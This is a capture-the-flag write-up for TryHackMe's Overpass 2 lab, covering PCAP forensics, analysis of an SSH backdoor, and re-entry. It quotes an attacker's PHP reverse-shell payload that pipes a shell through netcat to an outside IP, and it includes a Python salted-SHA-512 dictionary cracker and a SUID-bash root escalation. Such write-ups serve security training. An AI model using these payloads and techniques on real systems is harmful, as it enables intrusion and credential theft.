CTF-Writeups/TryHackMe/Overpass2.md
2020-11-28 21:20:40 +05:00


TryHackMe-Overpass 2

Forensics - Analyse the PCAP

  1. What was the URL of the page they used to upload a reverse shell?

development

  1. What payload did the attacker use to gain access?

`<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>`

  1. What password did the attacker use to privesc?

Follow the TCP stream starting at packet 4 (Analyze > Follow > TCP Stream in Wireshark) and step through the stream numbers until you reach the attacker's reverse-shell session; the password is typed in clear text when they switch user.

`whenevernoteartinstant`

  1. How did the attacker establish persistence?

https://github.com/NinjaJc01/ssh-backdoor

  1. Using the fasttrack wordlist, how many of the system passwords were crackable?

Copy the system password hashes the attacker dumped (they are visible in the same shell session in the PCAP) into a text file and run them against the fasttrack wordlist with a cracker such as John or hashcat.

4

Research - Analyse the code

  1. What's the default hash for the backdoor?

The default hash is hard-coded in the ssh-backdoor source on GitHub (linked above).

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

  1. What's the hardcoded salt for the backdoor?

The salt is the hard-coded string passed to the `verifyPass` function in the backdoor's source.

1c362db832f3f864c8c2fe05f2002a05

  1. What was the hash that the attacker used? - go back to the PCAP for this!

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

  1. Crack the hash using rockyou and a cracking tool of your choice. What's the password?

The backdoor compares a SHA-512 digest, so hashcat is the natural tool, but the raw SHA-512 mode (1700) finds nothing: the backdoor hashes the password concatenated with the hard-coded salt, which is hashcat mode 1710 (sha512($pass.$salt)).

Since we know the salt from the source, supply the hash and the default salt together in hashcat's hash:salt input format:

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05

november16
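The cracking step above, reproduced in Python as an added example (this is not code from the writeup or from the ssh-backdoor project). The backdoor's `hashPassword` computes the hex-encoded SHA-512 of the password followed by the salt, which is what hashcat mode 1710 (sha512($pass.$salt)) implements, so a dictionary attack is simply re-hashing each candidate with the hard-coded salt and comparing. The hash and salt are the values quoted above; the wordlist is a constructed stand-in for rockyou, and `crack_from_wordlist_file` is an added helper for running the same attack against a real wordlist file.

```python
import hashlib
from typing import Iterable, Optional, Tuple

# Values quoted in the writeup above (attacker's hash and the backdoor's default salt).
BACKDOOR_SALT = "1c362db832f3f864c8c2fe05f2002a05"
ATTACKER_HASH = (
    "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3"
    "e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed"
)

# Constructed stand-in for rockyou.txt: a few candidates, not the real list.
SAMPLE_WORDLIST = ["password", "123456", "letmein", "november16", "summer2020"]


def backdoor_hash(password: str, salt: str) -> str:
    """Mirror of the ssh-backdoor scheme: hex(SHA-512(password || salt)).

    Order matters: password first, then salt. hashcat calls this
    sha512($pass.$salt), mode 1710. Hashing salt||password instead
    (mode 1720) gives a different digest and the crack silently fails.
    """
    return hashlib.sha512((password + salt).encode("utf-8")).hexdigest()


def parse_hash_salt(line: str) -> Tuple[str, str]:
    """Split a hashcat-style 'hash:salt' line such as the one in the writeup."""
    digest, _, salt = line.strip().partition(":")
    if len(digest) != 128 or not salt:
        raise ValueError("expected <128 hex chars>:<salt>")
    return digest.lower(), salt


def crack(target_hash: str, salt: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first candidate whose salted SHA-512 matches, else None."""
    target = target_hash.lower()
    for word in candidates:
        if backdoor_hash(word, salt) == target:
            return word
    return None


def crack_from_wordlist_file(target_hash: str, salt: str, path: str) -> Optional[str]:
    """Same attack streamed from a wordlist file (e.g. rockyou.txt); hypothetical path supplied by caller."""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        return crack(target_hash, salt, (line.rstrip("\r\n") for line in fh))


if __name__ == "__main__":
    digest, salt = parse_hash_salt(f"{ATTACKER_HASH}:{BACKDOOR_SALT}")
    # The writeup reports that this hash resolves to november16.
    print(crack(digest, salt, SAMPLE_WORDLIST))
```

Against the real wordlist the equivalent hashcat invocation is mode 1710 with the hash:salt line above as input; the Python version is useful when you want to confirm the exact concatenation order before spending time on a full rockyou run.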

Attack - Get back in!

NMAP

```
nmap -sC -sV 10.10.196.150
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 21:06 PKT
Nmap scan report for 10.10.196.150
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
|   256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_  256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey: 
|_  2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.99 seconds
```

  1. The attacker defaced the website. What message did they leave as a heading?

H4ck3d by CooctusClan

  1. What's the user flag?

Now there are two ports open for SSH

Port 22 is the host's legitimate OpenSSH 7.6p1 service and the cracked password does not work there. Port 2222 advertises a different build (OpenSSH 8.2p1 Debian), which matches the ssh-backdoor the attacker installed for persistence; logging in there with the cracked password works.

thm{d119b4fa8c497ddb0525f7ad200e6567}

  1. What's the root flag?

The file `.suid_bash` is a copy of bash with the SUID bit set and owned by root, so it runs with root's effective UID. Bash normally drops that privilege when the effective and real UIDs differ; the `-p` (privileged) flag tells it not to, so `./.suid_bash -p` gives a shell with euid=0.

thm{d53b2684f169360bb9606c333873144d}